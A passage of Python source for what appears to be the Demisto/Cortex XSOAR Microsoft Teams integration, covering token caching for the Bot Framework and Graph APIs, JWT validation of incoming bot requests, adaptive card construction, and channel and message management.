            incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
            incident_type: str = str()
            type_match: Optional[Match[str]] = re.search(type_pattern, message)
            if type_match:
                incident_type = re.sub('name=.*', '', type_match.group()).strip()
            incident: dict = {'name': incident_name}
            # Fall back to the instance-configured default incident type.
            incident_type = incident_type or INCIDENT_TYPE
            if incident_type:
                incident['type'] = incident_type
            created_incident = create_incidents(demisto_user, [incident])
            if not created_incident:
                data = 'Failed creating incidents.'
    if created_incident:
        if isinstance(created_incident, list):
            created_incident = created_incident[0]
        created_incident = cast(Dict[Any, Any], created_incident)
        server_links: dict = demisto.demistoUrls()
        server_link: str = server_links.get('server', '')
        data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
               f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
    return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
    """
    Checks if investigation is already mirrored
    :param investigation_id: Investigation ID to check if mirrored
    :param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
    :return: Index in mirrored channels list if mirrored, else -1
    """
    return next(
        (
            position
            for position, channel in enumerate(mirrored_channels)
            if channel.get('investigation_id') == investigation_id
        ),
        -1,
    )
def urlify_hyperlinks(message: str) -> str:
    """
    Turns URL to markdown hyper-link
    e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
    :param message: Message to look for URLs in
    :return: Formatted message with hyper-links
    """
    formatted: str = message
    for found_url in re.findall(URL_REGEX, message):
        # NOTE: str.replace substitutes every occurrence, so a URL appearing
        # more than once is rewritten on each pass (preserved behaviour).
        formatted = formatted.replace(found_url, f'[{found_url}]({found_url})')
    return formatted
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
    """
    Searches for a team member
    :param integration_context: Cached object to search for team member in
    :param team_member_id: Team member ID to search for
    :return: Found team member object
    """
    cached_teams: list = json.loads(integration_context.get('teams', '[]'))
    for cached_team in cached_teams:
        for member in cached_team.get('team_members', []):
            if member.get('id') != team_member_id:
                continue
            return {
                'username': member.get('name', ''),
                'user_email': member.get('userPrincipalName', ''),
            }
    raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
    """
    Gets team member ID based on name, email or principal name
    :param requested_team_member: Team member name / principal name / email to look for
    :param integration_context: Cached object to search for team member in
    :return: Team member ID
    """
    cached_teams: list = json.loads(integration_context.get('teams', '[]'))
    for cached_team in cached_teams:
        for member in cached_team.get('team_members', []):
            known_names = {member.get('name', ''), member.get('userPrincipalName', '')}
            if requested_team_member in known_names:
                return member.get('id')
    raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
    """
    Creates Microsoft Teams adaptive card object given body and actions
    :param body: Adaptive card data
    :param actions: Adaptive card actions
    :return: Adaptive card object
    """
    content: dict = {
        '$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
        'version': '1.0',
        'type': 'AdaptiveCard',
        'body': body,
    }
    # Actions are optional; only attach the key when some were provided.
    if actions:
        content['actions'] = actions
    return {
        'contentType': 'application/vnd.microsoft.card.adaptive',
        'content': content,
    }
def process_tasks_list(data_by_line: list) -> dict:
    """
    Processes tasks list assigned to user given from Demisto server and creates adaptive card
    :param data_by_line: List of tasks to process
    :return: Adaptive card of assigned tasks
    """
    plain_titles = ('Task:', 'Incident:', 'Due:')
    card_body: list = []
    # The first two lines are the markdown table header and separator.
    for raw_line in data_by_line[2:]:
        columns = [cell.strip() for cell in raw_line.split('|')]
        facts = [
            {'title': title, 'value': value}
            for title, value in zip(plain_titles, columns)
        ]
        # The fourth column is a URL and is rendered as a markdown link.
        facts.append({'title': 'Link:', 'value': f'[{columns[3]}]({columns[3]})'})
        card_body.append({'type': 'FactSet', 'facts': facts})
    return create_adaptive_card(card_body)
def process_incidents_list(data_by_line: list) -> dict:
    """
    Processes incidents list assigned to user given from Demisto server and creates adaptive card
    :param data_by_line: List of incidents to process
    :return: Adaptive card of assigned incidents
    """
    plain_titles = ('ID:', 'Name:', 'Status:', 'Type:', 'Owner:', 'Created:')
    card_body: list = []
    # The first two lines are the markdown table header and separator.
    for raw_line in data_by_line[2:]:
        columns = [cell.strip() for cell in raw_line.split('|')]
        facts = [
            {'title': title, 'value': value}
            for title, value in zip(plain_titles, columns)
        ]
        # The seventh column is a URL and is rendered as a markdown link.
        facts.append({'title': 'Link:', 'value': f'[{columns[6]}]({columns[6]})'})
        card_body.append({'type': 'FactSet', 'facts': facts})
    return create_adaptive_card(card_body)
def process_mirror_or_unknown_message(message: str) -> dict:
    """
    Processes mirror investigation command or unknown direct message and creates adaptive card
    :param message: The direct message to process
    :return: Adaptive card of mirror response / unknown message
    """
    # Double the newlines so single line breaks survive markdown rendering.
    text_block = {
        'type': 'TextBlock',
        'text': message.replace('\n', '\n\n'),
        'wrap': True
    }
    return create_adaptive_card([text_block])
def process_ask_user(message: str) -> dict:
    """
    Processes ask user message and creates adaptive card
    :param message: The question object
    :return: Adaptive card of the question to send
    """
    question: dict = json.loads(message)
    card_body = [
        {
            'type': 'TextBlock',
            'text': question.get('message_text', '')
        }
    ]
    # Every answer button carries the same entitlement routing data plus its
    # own response value.
    routing = {
        'entitlement': question.get('entitlement', ''),
        'investigation_id': question.get('investigation_id', ''),
        'task_id': question.get('task_id', '')
    }
    submit_actions: list = [
        {
            'type': 'Action.Submit',
            'title': option,
            'data': {'response': option, **routing}
        }
        for option in question.get('options', [])
    ]
    return create_adaptive_card(card_body, submit_actions)
def get_bot_access_token() -> str:
    """
    Retrieves Bot Framework API access token, either from cache or from Microsoft
    :return: The Bot Framework API access token
    """
    integration_context: dict = demisto.getIntegrationContext()
    access_token: str = integration_context.get('bot_access_token', '')
    # NOTE(review): the fallback here is the *type* `int`, not a number --
    # presumably a typo for 0; harmless since it is only used when truthy.
    valid_until: int = integration_context.get('bot_valid_until', int)
    if access_token and valid_until:
        if epoch_seconds() < valid_until:
            # Cached token is still inside its validity window.
            return access_token
    url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
    data: dict = {
        'grant_type': 'client_credentials',
        'client_id': BOT_ID,
        'client_secret': BOT_PASSWORD,
        'scope': 'https://api.botframework.com/.default'
    }
    response: requests.Response = requests.post(
        url,
        data=data,
        verify=USE_SSL
    )
    if not response.ok:
        error = error_parser(response, 'bot')
        raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
    try:
        response_json: dict = response.json()
        access_token = response_json.get('access_token', '')
        expires_in: int = response_json.get('expires_in', 3595)
        time_now: int = epoch_seconds()
        time_buffer = 5  # seconds by which to shorten the validity period
        if expires_in - time_buffer > 0:
            # Err on the side of refreshing slightly before the real expiry.
            expires_in -= time_buffer
        # Cache the fresh token and its expiry for subsequent calls.
        integration_context['bot_access_token'] = access_token
        integration_context['bot_valid_until'] = time_now + expires_in
        demisto.setIntegrationContext(integration_context)
        return access_token
    except ValueError:
        raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
    """
    Retrieves Microsoft Graph API access token, either from cache or from Microsoft
    :return: The Microsoft Graph API access token
    """
    integration_context: dict = demisto.getIntegrationContext()
    access_token: str = integration_context.get('graph_access_token', '')
    # NOTE(review): the fallback is the *type* `int` -- presumably a typo for
    # 0; harmless since it is only used when truthy.
    valid_until: int = integration_context.get('graph_valid_until', int)
    if access_token and valid_until:
        if epoch_seconds() < valid_until:
            # Cached token is still inside its validity window.
            return access_token
    # The tenant ID is learned from incoming Teams traffic; without it we
    # cannot build the token endpoint URL.
    tenant_id: str = integration_context.get('tenant_id', '')
    if not tenant_id:
        raise ValueError(
            'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
        )
    url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
    data: dict = {
        'grant_type': 'client_credentials',
        'client_id': BOT_ID,
        'scope': 'https://graph.microsoft.com/.default',
        'client_secret': BOT_PASSWORD
    }
    response: requests.Response = requests.post(
        url,
        data=data,
        verify=USE_SSL
    )
    if not response.ok:
        error = error_parser(response)
        raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
    try:
        response_json: dict = response.json()
        access_token = response_json.get('access_token', '')
        expires_in: int = response_json.get('expires_in', 3595)
        time_now: int = epoch_seconds()
        time_buffer = 5  # seconds by which to shorten the validity period
        if expires_in - time_buffer > 0:
            # Err on the side of refreshing slightly before the real expiry.
            expires_in -= time_buffer
        # Cache the fresh token and its expiry for subsequent calls.
        integration_context['graph_access_token'] = access_token
        integration_context['graph_valid_until'] = time_now + expires_in
        demisto.setIntegrationContext(integration_context)
        return access_token
    except ValueError:
        raise ValueError('Failed to get Graph access token')
def http_request(
    method: str, url: str = '', json_: dict = None, api: str = 'graph'
) -> Union[dict, list]:
    """
    A wrapper for requests lib to send our requests and handle requests and responses better
    Headers to be sent in requests
    :param method: any restful method
    :param url: URL to query
    :param json_: HTTP JSON body
    :param api: API to query (graph/bot)
    :return: requests.json()
    """
    # Pick the bearer token matching the target API.
    if api == 'graph':
        access_token = get_graph_access_token()
    else:  # Bot Framework API
        access_token = get_bot_access_token()
    headers: dict = {
        'Authorization': f'Bearer {access_token}',
        'Content-Type': 'application/json',
        'Accept': 'application/json'
    }
    try:
        response: requests.Response = requests.request(
            method,
            url,
            headers=headers,
            json=json_,
            verify=USE_SSL
        )
        if not response.ok:
            error: str = error_parser(response, api)
            raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
        if response.status_code in {202, 204}:
            # Delete channel or remove user from channel return 204 if successful
            # Update message returns 202 if the request has been accepted for processing
            return {}
        if response.status_code == 201:
            # For channel creation query, we get a body in the response, otherwise we should just return
            if not response.content:
                return {}
        try:
            return response.json()
        except ValueError:
            # Successful status but non-JSON body: surface the raw text.
            raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
    except requests.exceptions.ConnectTimeout:
        error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
                        'accessible from your host.'
        raise ConnectionError(error_message)
    except requests.exceptions.SSLError:
        error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
                        'the integration configuration.'
        raise ConnectionError(error_message)
    except requests.exceptions.ProxyError:
        error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
                        'selected, try deselecting it.'
        raise ConnectionError(error_message)
def integration_health():
    """Report Bot Framework / Graph token health plus mirrored channels as a war-room entry."""
    bot_framework_api_health = 'Operational'
    graph_api_health = 'Operational'
    # Probe each token endpoint; a ValueError means that API is unreachable
    # or misconfigured.
    try:
        get_bot_access_token()
    except ValueError as e:
        bot_framework_api_health = f'Non operational - {str(e)}'
    try:
        get_graph_access_token()
    except ValueError as e:
        graph_api_health = f'Non operational - {str(e)}'
    api_health_output: list = [{
        'Bot Framework API Health': bot_framework_api_health,
        'Graph API Health': graph_api_health
    }]
    adi_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
    mirrored_channels_output = list()
    integration_context: dict = demisto.getIntegrationContext()
    teams: list = json.loads(integration_context.get('teams', '[]'))
    # Flatten the cached team -> mirrored channel mapping for display.
    for team in teams:
        mirrored_channels: list = team.get('mirrored_channels', [])
        for channel in mirrored_channels:
            mirrored_channels_output.append({
                'Team': team.get('team_name'),
                'Channel': channel.get('channel_name'),
                'Investigation ID': channel.get('investigation_id')
            })
    mirrored_channels_human_readable: str
    if mirrored_channels_output:
        mirrored_channels_human_readable = tableToMarkdown(
            'Microsoft Teams Mirrored Channels', mirrored_channels_output
        )
    else:
        mirrored_channels_human_readable = 'No mirrored channels.'
    demisto.results({
        'ContentsFormat': formats['json'],
        'Type': entryTypes['note'],
        'HumanReadable': adi_health_human_readable + mirrored_channels_human_readable,
        'Contents': adi_health_human_readable + mirrored_channels_human_readable
    })
def validate_auth_header(headers: dict) -> bool:
    """
    Validates authorization header provided in the bot activity object.

    Verifies in order: header shape, Bearer schema, issuer claim, that the
    signing key (looked up by ``kid``) is known/endorsed for msteams, the
    token signature + expiration, and finally the audience claim.
    :param headers: Bot activity headers
    :return: True if authorized, else False
    """
    parts: list = headers.get('Authorization', '').split(' ')
    if len(parts) != 2:
        return False
    schema: str = parts[0]
    jwt_token: str = parts[1]
    if schema != 'Bearer' or not jwt_token:
        demisto.info('Authorization header validation - failed to verify schema')
        return False
    # Decode WITHOUT verification first, only to inspect the issuer claim
    decoded_payload: dict = jwt.decode(jwt_token, verify=False)
    issuer: str = decoded_payload.get('iss', '')
    if issuer != 'https://api.botframework.com':
        demisto.info('Authorization header validation - failed to verify issuer')
        return False
    integration_context: dict = demisto.getIntegrationContext()
    open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
    keys: list = open_id_metadata.get('keys', [])
    unverified_headers: dict = jwt.get_unverified_header(jwt_token)
    key_id: str = unverified_headers.get('kid', '')
    key_object: dict = dict()
    # Check if we got the requested key in cache
    for key in keys:
        if key.get('kid') == key_id:
            key_object = key
            break
    if not key_object:
        # Didn't find requested key in cache, getting new keys
        try:
            open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
            response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
            if not response.ok:
                demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
                return False
            response_json: dict = response.json()
            jwks_uri: str = response_json.get('jwks_uri', '')
            keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
            if not keys_response.ok:
                # Bug fix: previously logged the open ID config response's
                # reason here instead of the failed keys response's reason.
                demisto.info(f'Authorization header validation failed to fetch keys - {keys_response.reason}')
                return False
            keys_response_json: dict = keys_response.json()
            keys = keys_response_json.get('keys', [])
            open_id_metadata['keys'] = keys
        except ValueError:
            demisto.info('Authorization header validation - failed to parse keys response')
            return False
    if not keys:
        # Didn't get new keys
        demisto.info('Authorization header validation - failed to get keys')
        return False
    # Find requested key in new keys
    for key in keys:
        if key.get('kid') == key_id:
            key_object = key
            break
    if not key_object:
        # Didn't find requested key in new keys
        demisto.info('Authorization header validation - failed to find relevant key')
        return False
    endorsements: list = key_object.get('endorsements', [])
    if not endorsements or 'msteams' not in endorsements:
        demisto.info('Authorization header validation - failed to verify endorsements')
        return False
    public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
    options = {
        'verify_aud': False,  # audience is checked manually below
        'verify_exp': True
    }
    # Full verification of signature and expiration against the matched JWK
    decoded_payload = jwt.decode(jwt_token, public_key, options=options)
    audience_claim: str = decoded_payload.get('aud', '')
    if audience_claim != demisto.params().get('bot_id'):
        demisto.info('Authorization header validation - failed to verify audience_claim')
        return False
    # Persist the (possibly refreshed) open ID metadata for future requests
    integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
    demisto.setIntegrationContext(integration_context)
    return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
    """
    Gets Team AAD ID, preferring the cached team list over a Graph API call.
    :param team_name: Team name to get AAD ID of
    :return: team AAD ID
    :raises ValueError: if no team with the given name exists
    """
    integration_context: dict = demisto.getIntegrationContext()
    cached_teams = integration_context.get('teams')
    if cached_teams:
        for cached_team in json.loads(cached_teams):
            if cached_team.get('team_name', '') == team_name:
                return cached_team.get('team_aad_id', '')
    # Cache miss - query the Graph API for groups provisioned as Teams
    url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
    response: dict = cast(Dict[Any, Any], http_request('GET', url))
    for graph_team in response.get('value', []):
        if graph_team.get('displayName', '') == team_name:
            return graph_team.get('id', '')
    raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_users() -> list:
    """
    Retrieves list of AAD users via the Graph API.
    :return: List of AAD users
    """
    response: dict = cast(Dict[Any, Any], http_request('GET', f'{GRAPH_BASE_URL}/v1.0/users'))
    return response.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
    """
    Request for adding user to channel
    :param team_aad_id: AAD ID of the team the channel belongs to
    :param channel_id: ID of the channel to add the user to
    :param user_id: AAD ID of the user to add
    """
    member_payload: dict = {
        '@odata.type': '#microsoft.graph.aadUserConversationMember',
        'roles': [],
        'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}'  # disable-secrets-detection
    }
    members_url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
    http_request('POST', members_url, json_=member_payload)
def add_user_to_channel_command():
    """
    Add user to channel (private channel only as still in beta mode).
    Resolves the given member by display name, mail or UPN before adding.
    :raises ValueError: if the member is not a known AAD user
    """
    channel_name: str = demisto.args().get('channel', '')
    team_name: str = demisto.args().get('team', '')
    member = demisto.args().get('member', '')
    user_id: str = ''
    for user in get_users():
        # A member may be referenced by any of these three identifiers
        if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
            user_id = user.get('id', '')
            break
    else:
        raise ValueError(f'User {member} was not found')
    team_aad_id = get_team_aad_id(team_name)
    channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
    add_user_to_channel(team_aad_id, channel_id, user_id)
    demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
    """
    Creates a Microsoft Teams channel
    :param team_aad_id: Team AAD ID to create channel in
    :param channel_name: Name of channel to create
    :param channel_description: Description of channel to create
    :return: ID of created channel
    """
    channel_payload: dict = {
        'displayName': channel_name,
        'description': channel_description
    }
    creation_response: dict = cast(
        Dict[Any, Any],
        http_request('POST', f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels', json_=channel_payload)
    )
    return creation_response.get('id', '')
def create_channel_command():
    """Creates a channel in the requested team and reports success to the war room."""
    channel_name: str = demisto.args().get('channel_name', '')
    channel_description: str = demisto.args().get('description', '')
    team_name: str = demisto.args().get('team', '')
    new_channel_id: str = create_channel(get_team_aad_id(team_name), channel_name, channel_description)
    if new_channel_id:
        demisto.results(f'The channel "{channel_name}" was created successfully')
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
    """
    Retrieves Microsoft Teams channel ID
    :param channel_name: Name of channel to get ID of
    :param team_aad_id: AAD ID of team to search channel in
    :param investigation_id: Demisto investigation ID to search mirrored channel of
    :return: Requested channel ID
    :raises ValueError: if no channel matches the given name
    """
    investigation_id = investigation_id or str()
    integration_context: dict = demisto.getIntegrationContext()
    cached_teams: list = json.loads(integration_context.get('teams', '[]'))
    # A mirrored channel can be matched either by name or by investigation ID
    for cached_team in cached_teams:
        for mirrored_channel in cached_team.get('mirrored_channels', []):
            if mirrored_channel.get('channel_name') == channel_name \
                    or mirrored_channel.get('investigation_id') == investigation_id:
                return mirrored_channel.get('channel_id')
    # Not a mirrored channel - look it up through the Graph API
    response: dict = cast(
        Dict[Any, Any],
        http_request('GET', f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels')
    )
    channel_id: str = ''
    for channel in response.get('value', []):
        if channel.get('displayName', '') == channel_name:
            channel_id = channel.get('id', '')
            break
    if not channel_id:
        raise ValueError(f'Could not find channel: {channel_name}')
    return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
    """
    Retrieves team members given a team
    :param team_id: ID of team to get team members of
    :param service_url: Bot service URL to query
    :return: List of team members
    """
    members_url: str = f'{service_url}/v3/conversations/{team_id}/members'
    return cast(List[Any], http_request('GET', members_url, api='bot'))
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
    """
    Updates a message in Microsoft Teams channel
    :param service_url: Bot service URL to query
    :param conversation_id: Conversation ID of message to update
    :param activity_id: Activity ID of message to update
    :param text: Text to update in the message
    :return: None
    """
    # The replacement content is sent as an adaptive card with a single text block
    card_body = [{
        'type': 'TextBlock',
        'text': text
    }]
    conversation = {
        'type': 'message',
        'attachments': [create_adaptive_card(body=card_body)]
    }
    activity_url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
    http_request('PUT', activity_url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
    """
    Sends an HTTP request to close a Microsoft Teams channel
    :param team_aad_id: AAD ID of team to close the channel in
    :param channel_id: ID of channel to close
    :return: None
    """
    http_request('DELETE', f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}')
def close_channel():
    """
    Deletes a mirrored Microsoft Teams channel.

    Two modes: when no channel argument is given, the channel mirroring the
    current investigation is located in the cache and closed (autoclose flow);
    otherwise the explicitly named channel is resolved and closed.
    :raises ValueError: in autoclose mode, if no mirrored channel matches the
        current investigation.
    """
    integration_context: dict = demisto.getIntegrationContext()
    channel_name: str = demisto.args().get('channel', '')
    investigation: dict = demisto.investigation()
    investigation_id: str = investigation.get('id', '')
    channel_id: str = str()
    team_aad_id: str
    mirrored_channels: list
    if not channel_name:
        # Closing channel as part of autoclose in mirroring process
        teams: list = json.loads(integration_context.get('teams', '[]'))
        for team in teams:
            team_aad_id = team.get('team_aad_id', '')
            mirrored_channels = team.get('mirrored_channels', [])
            for channel_index, channel in enumerate(mirrored_channels):
                if channel.get('investigation_id') == investigation_id:
                    channel_id = channel.get('channel_id', '')
                    close_channel_request(team_aad_id, channel_id)
                    # Drop the closed channel from the team's mirror list.
                    # Popping during enumerate is safe here because we break
                    # out of the inner loop immediately afterwards.
                    mirrored_channels.pop(channel_index)
                    team['mirrored_channels'] = mirrored_channels
                    break
        if not channel_id:
            raise ValueError('Could not find Microsoft Teams channel to close.')
        # Persist the updated mirror list back to the integration cache
        integration_context['teams'] = json.dumps(teams)
        demisto.setIntegrationContext(integration_context)
    else:
        # Explicit channel close: resolve team and channel IDs, then delete
        team_name: str = demisto.args().get('team') or demisto.params().get('team')
        team_aad_id = get_team_aad_id(team_name)
        channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
        close_channel_request(team_aad_id, channel_id)
    demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
    """
    Create a personal conversation with a team member
    :param integration_context: Cached object to retrieve relevant data for the conversation creation
    :param team_member_id: ID of team member to create a conversation with
    :return: ID of created conversation
    :raises ValueError: if the bot service URL is not cached yet
    """
    bot_id: str = demisto.params().get('bot_id', '')
    conversation_payload: dict = {
        'bot': {
            'id': f'28:{bot_id}',
            'name': integration_context.get('bot_name', '')
        },
        'members': [{
            'id': team_member_id
        }],
        'channelData': {
            'tenant': {
                'id': integration_context.get('tenant_id', '')
            }
        }
    }
    service_url: str = integration_context.get('service_url', '')
    if not service_url:
        raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
    response: dict = cast(
        Dict[Any, Any],
        http_request('POST', f'{service_url}/v3/conversations', json_=conversation_payload, api='bot')
    )
    return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
    """
    Sends an HTTP request to send message to Microsoft Teams
    :param channel_id: ID of channel to send message in
    :param conversation: Conversation message object to send
    :param service_url: Bot service URL to query
    :return: None
    """
    http_request('POST', f'{service_url}/v3/conversations/{channel_id}/activities', json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
    """
    Processes the message to include all mentioned users in the right format. For example:
    Input: 'good morning @Demisto'
    Output (Formatted message): 'good morning <at>@Demisto</at>'
    :param message: The message to be processed
    :return: A list of the mentioned users, The processed message
    """
    # MENTION_REGEX may return tuple groups - join each match into one name
    mentioned_users: list = [''.join(match_groups) for match_groups in re.findall(MENTION_REGEX, message)]
    for mentioned_user in mentioned_users:
        message = message.replace(f'@{mentioned_user};', f'<at>@{mentioned_user}</at>')
    return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
    """
    Returns a list of entities built from the mentioned users
    :param mentioned_users: A list of mentioned users in the message
    :param integration_context: Cached object to retrieve relevant data from
    :return: A list of entities
    """
    entities: list = []
    for user in mentioned_users:
        entities.append({
            'type': 'mention',
            'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
            'text': f'<at>@{user}</at>'
        })
    return entities
def send_message():
    """
    Sends a message to a Microsoft Teams channel or a team member.

    Handles four flows: server notifications (filtered by severity
    threshold), mirrored war-room entries, plain text messages (with
    @-mention and hyperlink formatting), and adaptive cards - including
    the TeamsAsk entitlement flow.
    :raises ValueError: on invalid adaptive card JSON, missing/conflicting
        recipient or content arguments, or missing cached service URL.
    """
    message_type: str = demisto.args().get('messageType', '')
    original_message: str = demisto.args().get('originalMessage', '')
    message: str = demisto.args().get('message', '')
    try:
        adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
    except ValueError:
        raise ValueError('Given adaptive card is not in valid JSON format.')
    if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
        # Got a message which was already mirrored - skipping it
        return
    channel_name: str = demisto.args().get('channel', '')
    if (not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}) \
            or channel_name == INCIDENT_NOTIFICATIONS_CHANNEL:
        # Got a notification from server
        channel_name = demisto.params().get('incident_notifications_channel', 'General')
        severity: int = int(demisto.args().get('severity'))
        severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
        if severity < severity_threshold:
            # Below the configured severity threshold - don't notify
            return
    team_member: str = demisto.args().get('team_member', '')
    # Exactly one recipient (channel XOR team member) must be provided
    if not (team_member or channel_name):
        raise ValueError('No channel or team member to send message were provided.')
    if team_member and channel_name:
        raise ValueError('Provide either channel or team member to send message to, not both.')
    # Exactly one content kind (message XOR adaptive card) must be provided.
    # Bug fix: the second error message previously read "message or adaptive
    # to send" - the word "card" was missing.
    if not (message or adaptive_card):
        raise ValueError('No message or adaptive card to send were provided.')
    if message and adaptive_card:
        raise ValueError('Provide either message or adaptive card to send, not both.')
    integration_context: dict = demisto.getIntegrationContext()
    channel_id: str = str()
    personal_conversation_id: str = str()
    if channel_name:
        team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
        team_aad_id: str = get_team_aad_id(team_name)
        investigation_id: str = str()
        if message_type == MESSAGE_TYPES['mirror_entry']:
            # Got an entry from the War Room to mirror to Teams
            # Getting investigation ID in case channel name is custom and not the default
            investigation: dict = demisto.investigation()
            investigation_id = investigation.get('id', '')
        channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
    elif team_member:
        # Direct message: open (or reuse) a personal conversation with the member
        team_member_id: str = get_team_member_id(team_member, integration_context)
        personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
    recipient: str = channel_id or personal_conversation_id
    conversation: dict
    if message:
        entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
        if entitlement_match:
            # In TeamsAsk process
            adaptive_card = process_ask_user(message)
            conversation = {
                'type': 'message',
                'attachments': [adaptive_card]
            }
        else:
            # Sending regular message
